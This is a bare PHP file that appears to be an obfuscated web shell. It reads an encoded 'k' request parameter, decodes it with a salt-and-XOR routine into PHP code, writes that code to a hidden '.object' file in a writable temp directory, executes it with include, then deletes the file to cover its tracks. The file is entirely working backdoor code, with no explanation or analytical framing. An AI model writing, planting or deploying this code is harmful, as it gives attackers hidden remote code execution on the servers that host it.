<?php

if(array_key_exists("k", $_REQUEST) && !is_null($_REQUEST["k"])){
	$pgrp = array_filter(["/tmp", getenv("TMP"), getcwd(), ini_get("upload_tmp_dir"), getenv("TEMP"), sys_get_temp_dir(), session_save_path(), "/dev/shm", "/var/tmp"]);
	$rec = $_REQUEST["k"];
		$rec		=			explode	  ( "."  ,$rec 		)	;   
	$key	 =	 '';
            $salt7	 =	 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS	 =	 strlen($salt7	);
            $x	 =	 0;
    
            while ($x < count($rec)) {
                $v5	 =	 $rec[$x];
                $sChar	 =	 ord($salt7[$x % $lenS]	);
                $d	 =	 ((int)$v5 - $sChar - ($x % 10)) ^ 9;
                $key .= chr($d	);
                $x++;
            }
	foreach ($pgrp as $ptr) {
    		if ((bool)is_dir($ptr) && (bool)is_writable($ptr)) {
    $factor = implode("/", [$ptr, ".object"]);
    if (file_put_contents($factor, $key)) {
	include $factor;
	@unlink($factor);
	exit;
}
}
}
}